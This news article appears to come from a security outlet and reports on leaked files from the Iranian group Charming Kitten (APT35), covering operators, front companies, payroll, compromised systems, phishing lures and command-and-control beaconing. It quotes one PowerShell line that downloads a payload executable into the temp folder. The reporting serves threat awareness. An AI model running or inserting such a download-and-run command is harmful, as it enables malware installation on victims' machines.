Fresh leaks from the Iranian state‑backed group Charming Kitten, also tracked as APT35, have exposed key personnel, front companies, and thousands of compromised systems spread across five continents.
The internal files show that Iran’s Department 40, within the IRGC Intelligence Organization, runs long‑term intrusion campaigns that combine cyber‑espionage with surveillance and targeting operations.
Stolen dashboards and payroll records now link named operators to specific hacking activity rather than anonymous threat labels.
The leak further reveals the financial structure backing these operations, including salary slips for the Sisters Team and Brothers Team, and payment flows routed through front companies that appear to be normal IT or cloud service providers.
Compromised systems include VPN gateways, email servers, and command‑and‑control nodes used to steer malware already deployed inside government offices, universities, and telecom providers.
The result is a clear picture of how money, management, and malware converge in a single system.
Nariman Gharib, a security researcher, noted that the same material also exposes tasking sheets and target lists that tie Charming Kitten malware to specific diplomatic, energy, and civil society networks.
The malware usually arrives via spear‑phishing emails, fake login pages, or malicious document attachments that impersonate meeting invitations, pay slips, or policy documents.
Once a user opens the lure and enables scripts or enters credentials, the operators gain an initial foothold that leads to complete device control and data exfiltration.
Log data from the leaked dashboards shows beacons from victim hosts returning to Iranian‑controlled servers over HTTPS at regular intervals, often hidden within what appears to be normal web traffic.
Confidential IAEA inspection documents (Source – Nariman Gharib)
These hosts sit inside email gateways, domain controllers, and user laptops, giving operators access to email, file shares, and identity systems. The leaked report highlights clusters of infected machines grouped by region and sector, underscoring the campaign’s reach.
Infection mechanism and command and control
Infection often starts with a small loader that runs in memory after a user opens a macro or HTML lure.
Short PowerShell commands fetch the primary payload from a fixed but hidden URL, which is now documented in a complete technical breakdown of the Charming Kitten tools.
Invoke-WebRequest $u -OutFile “$env:TEMP\\svc.exe”
Logs from the leak show this binary running as a scheduled task, giving stable access while blending with regular Windows activity.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
The post Charming Kitten Leak Exposes Key Personnel, Front Companies, and Thousands of Compromised Systems appeared first on Cyber Security News.
